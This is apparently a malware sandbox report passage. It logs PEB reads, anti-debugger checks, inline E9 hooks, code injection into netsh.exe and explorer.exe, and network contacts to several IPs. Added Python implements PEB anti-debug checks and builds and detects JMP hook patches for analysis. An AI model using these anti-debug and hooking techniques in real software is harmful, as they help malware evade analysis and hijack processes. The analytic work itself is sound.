Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h] 9_2_03743D43
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03783540 mov eax, dword ptr fs:[00000030h] 9_2_03783540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h] 9_2_037B3D40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h] 9_2_0370AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h] 9_2_03713D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h] 9_2_037CE539
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h] 9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h] 9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h] 9_2_03734D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h] 9_2_037D8D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h] 9_2_0378A537
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h] 9_2_037B8DF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h] 9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h] 9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h] 9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h] 9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h] 9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h] 9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h] 9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h] 9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h] 9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h] 9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h] 9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h] 9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h] 9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h] 9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h] 9_2_037D05AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h] 9_2_037D05AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h] 9_2_037335A1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h] 9_2_0373FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h] 9_2_0373FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h] 9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h] 9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h] 9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h] 9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h] 9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h] 9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h] 9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h] 9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h] 9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h] 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h] 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h] 9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372746D mov eax, dword ptr fs:[00000030h] 9_2_0372746D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h] 9_2_0379C450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h] 9_2_0379C450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373A44B mov eax, dword ptr fs:[00000030h] 9_2_0373A44B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373BC2C mov eax, dword ptr fs:[00000030h] 9_2_0373BC2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h] 9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h] 9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h] 9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h] 9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h] 9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h] 9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h] 9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h] 9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C14FB mov eax, dword ptr fs:[00000030h] 9_2_037C14FB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h] 9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h] 9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h] 9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D8CD6 mov eax, dword ptr fs:[00000030h] 9_2_037D8CD6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371849B mov eax, dword ptr fs:[00000030h] 9_2_0371849B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h] 9_2_037C4496
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10002EDC GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd, 1_2_10002EDC
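The fs:[00000030h] reads listed above load the 32-bit PEB pointer from the TEB; the GetProcessHeap hit directly above is reported for the same reason, because PEB.ProcessHeap is what the classic heap-flags check inspects. In that particular hit, though, the surrounding call sequence (__RTC_Initialize, __cinit, __setargv, __ioinit) is the MSVC C runtime's start-up code, so it reflects the runtime's own heap use rather than a deliberate check; the fs:[30h] reads in the injected netsh.exe code are the stronger indicator. The Python below is an added example, not code from the report or from the sample: it collapses the per-instruction hits into one entry per function and runs the three PEB-based checks (BeingDebugged, NtGlobalFlag, heap Flags/ForceFlags) over constructed 32-bit PEB and _HEAP images. The offsets are the well-known x86 layouts; the heap address, the function names and the two image sets are constructed for the example.

```python
import re
import struct

# Well-known 32-bit (x86 / WoW64) layouts used by PEB-based anti-debug checks.
# fs:[0x30] is TEB.ProcessEnvironmentBlock, the pointer the report's
# "mov eax, dword ptr fs:[00000030h]" hits are loading.
PEB_BEING_DEBUGGED = 0x02   # UCHAR  PEB.BeingDebugged
PEB_PROCESS_HEAP   = 0x18   # PVOID  PEB.ProcessHeap (the value GetProcessHeap returns)
PEB_NTGLOBALFLAG   = 0x68   # ULONG  PEB.NtGlobalFlag
HEAP_FLAGS         = 0x40   # ULONG  _HEAP.Flags      (x86, Vista and later)
HEAP_FORCE_FLAGS   = 0x44   # ULONG  _HEAP.ForceFlags (x86, Vista and later)
HEAP_GROWABLE      = 0x02   # the only flag a normally created process heap carries

# NtGlobalFlag bits the loader sets when a process is created under a debugger
FLG_HEAP_ENABLE_TAIL_CHECK   = 0x10
FLG_HEAP_ENABLE_FREE_CHECK   = 0x20
FLG_HEAP_VALIDATE_PARAMETERS = 0x40
NTGLOBALFLAG_DEBUG_MASK = (FLG_HEAP_ENABLE_TAIL_CHECK
                           | FLG_HEAP_ENABLE_FREE_CHECK
                           | FLG_HEAP_VALIDATE_PARAMETERS)

PEB_READ_RE = re.compile(
    r"Code function: (?P<func>\d+_\d+_[0-9A-F]+) mov (?P<reg>\w+), dword ptr fs:\[00000030h\]")


def peb_reading_functions(report_lines):
    """Collapse the report's per-instruction fs:[30h] hits into {function: read count}."""
    counts = {}
    for line in report_lines:
        m = PEB_READ_RE.search(line)
        if m:
            counts[m.group("func")] = counts.get(m.group("func"), 0) + 1
    return counts


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def debugger_indicators(peb, heap):
    """Run the three classic PEB checks over raw 32-bit PEB and _HEAP images.

    Returns one boolean per check; malware usually ORs them together."""
    nt_global_flag = _u32(peb, PEB_NTGLOBALFLAG)
    heap_flags = _u32(heap, HEAP_FLAGS)
    heap_force_flags = _u32(heap, HEAP_FORCE_FLAGS)
    return {
        "BeingDebugged": peb[PEB_BEING_DEBUGGED] != 0,
        "NtGlobalFlag": (nt_global_flag & NTGLOBALFLAG_DEBUG_MASK) != 0,
        # a debug heap carries Flags bits beyond HEAP_GROWABLE and a non-zero ForceFlags
        "HeapFlags": (heap_flags & ~HEAP_GROWABLE) != 0 or heap_force_flags != 0,
    }


def build_images(being_debugged, nt_global_flag, heap_flags, heap_force_flags,
                 heap_address=0x00500000):
    """Constructed PEB/_HEAP byte images for testing (not a memory dump from the sample)."""
    peb = bytearray(0x100)
    peb[PEB_BEING_DEBUGGED] = 1 if being_debugged else 0
    struct.pack_into("<I", peb, PEB_PROCESS_HEAP, heap_address)  # hypothetical heap address
    struct.pack_into("<I", peb, PEB_NTGLOBALFLAG, nt_global_flag)
    heap = bytearray(0x80)
    struct.pack_into("<I", heap, HEAP_FLAGS, heap_flags)
    struct.pack_into("<I", heap, HEAP_FORCE_FLAGS, heap_force_flags)
    return bytes(peb), bytes(heap)


# Typical values for a 32-bit process started normally vs. under a user-mode debugger.
CLEAN = build_images(False, 0x00000000, HEAP_GROWABLE, 0x00000000)
DEBUGGED = build_images(True, 0x00000070, 0x50000062, 0x40000060)

# Constructed excerpt: four of the report's own hits, in the report's format.
SAMPLE_REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h] 9_2_037299BF",
    r"Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h] 9_2_037299BF",
    r"Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h] 9_2_037299BF",
    r"Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h] 9_2_037361A0",
]

if __name__ == "__main__":
    print("PEB-reading functions:", peb_reading_functions(SAMPLE_REPORT_LINES))
    print("clean process:   ", debugger_indicators(*CLEAN))
    print("debugged process:", debugger_indicators(*DEBUGGED))
```

The heap check is the one that survives a debugger that simply clears PEB.BeingDebugged: Flags and ForceFlags are set by the loader from NtGlobalFlag when the heap is created, so a debugger attached after start-up leaves all three clear, which is why sandboxes and unpackers prefer attaching late or patching the fields before the sample's code runs.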
Enables debug privileges
Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_10004CBC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_10002ECD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_10007786

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 75.126.100.11 80
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.24 80
Source: C:\Windows\explorer.exe Network Connect: 95.215.210.10 80
Source: C:\Windows\explorer.exe Network Connect: 165.227.229.15 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 23.88.85.105 80
Hijacks the control flow in another process
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165050 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771650F0 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165180 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165190 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771651A0 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7717FEE0 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771133C0 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77114760 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770D6590 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770DB510 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770FC490 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EE00 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7711EFD0 value: E9
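Each "Memory written ... value: E9" line above is the first byte of a 5-byte near jump (JMP rel32) being written at the start of a function inside another process: the classic inline hook that redirects an API call into attacker-controlled code. The addresses sit in a high range typical of a system DLL, but the report does not name the module, so nothing below assumes one. The Python that follows is an added example, not code from the report or from the sample: it groups those writes by writer and target PID, encodes and decodes the rel32 displacement so the hook target can be recovered from the patch bytes, and diffs a clean module image against a live one to find hooked exports. The module base, export names and RVAs, injected-region address and byte images are all constructed for the example.

```python
import re
import struct

JMP_REL32 = 0xE9  # opcode of the 5-byte near jump the report sees being written

MEM_WRITE_RE = re.compile(
    r"Source: (?P<src>\S+) Memory written: PID: (?P<pid>\d+) "
    r"base: (?P<base>[0-9A-Fa-f]+) value: (?P<byte>[0-9A-Fa-f]{2})")


def hook_writes(report_lines):
    """Group 'Memory written' hits whose first byte is E9 by (writer, target PID)."""
    hooks = {}
    for line in report_lines:
        m = MEM_WRITE_RE.search(line)
        if m and int(m.group("byte"), 16) == JMP_REL32:
            key = (m.group("src"), int(m.group("pid")))
            hooks.setdefault(key, []).append(int(m.group("base"), 16))
    return hooks


def encode_jmp_rel32(patch_address, target):
    """Build the 5-byte E9 patch that jumps from patch_address to target (32-bit)."""
    rel = target - (patch_address + 5)          # displacement is relative to the next instruction
    return bytes([JMP_REL32]) + struct.pack("<i", rel)


def decode_jmp_rel32(patch_address, patch_bytes):
    """Resolve where an E9 patch located at patch_address transfers control to."""
    if len(patch_bytes) < 5 or patch_bytes[0] != JMP_REL32:
        raise ValueError("not a JMP rel32 patch")
    rel = struct.unpack_from("<i", patch_bytes, 1)[0]
    return (patch_address + 5 + rel) & 0xFFFFFFFF


def find_inline_hooks(module_base, clean_image, live_image, exports):
    """Diff the first five bytes of each export between an on-disk and an in-memory
    copy of a module. An E9 that is not in the clean copy is an inline hook; its
    decoded target says which foreign region now handles the call."""
    findings = {}
    for name, rva in exports.items():
        clean, live = clean_image[rva:rva + 5], live_image[rva:rva + 5]
        if live != clean and live[0] == JMP_REL32:
            findings[name] = decode_jmp_rel32(module_base + rva, live)
    return findings


# --- constructed test data: a hypothetical module, not bytes taken from the sample ---
MODULE_BASE = 0x77100000                              # hypothetical load address
HOTPATCH_PROLOGUE = bytes.fromhex("8BFF558BEC")      # mov edi,edi; push ebp; mov ebp,esp
EXPORTS = {"export_a": 0x1000, "export_b": 0x2000}    # hypothetical export RVAs
INJECTED_REGION = 0x00A00000                          # hypothetical hook handler address


def build_module_images():
    """Clean image plus a live copy in which export_b has been hooked."""
    clean = bytearray(0x3000)
    for rva in EXPORTS.values():
        clean[rva:rva + 5] = HOTPATCH_PROLOGUE
    live = bytearray(clean)
    rva = EXPORTS["export_b"]
    live[rva:rva + 5] = encode_jmp_rel32(MODULE_BASE + rva, INJECTED_REGION)
    return bytes(clean), bytes(live)


# Three of the report's own lines, in the report's format.
SAMPLE_REPORT_LINES = [
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165050 value: E9",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771650F0 value: E9",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 770D6590 value: E9",
]

if __name__ == "__main__":
    print({k: [hex(a) for a in v] for k, v in hook_writes(SAMPLE_REPORT_LINES).items()})
    clean, live = build_module_images()
    hooks = find_inline_hooks(MODULE_BASE, clean, live, EXPORTS)
    print({name: hex(target) for name, target in hooks.items()})
```

On a live system the same diff is what memory-forensics tooling does when it compares a loaded module's export prologues with the file on disk; a jump target that falls outside any loaded module's image range, as it would here, is the injected region worth dumping.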
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3424
Queues an APC in another process (thread injection)
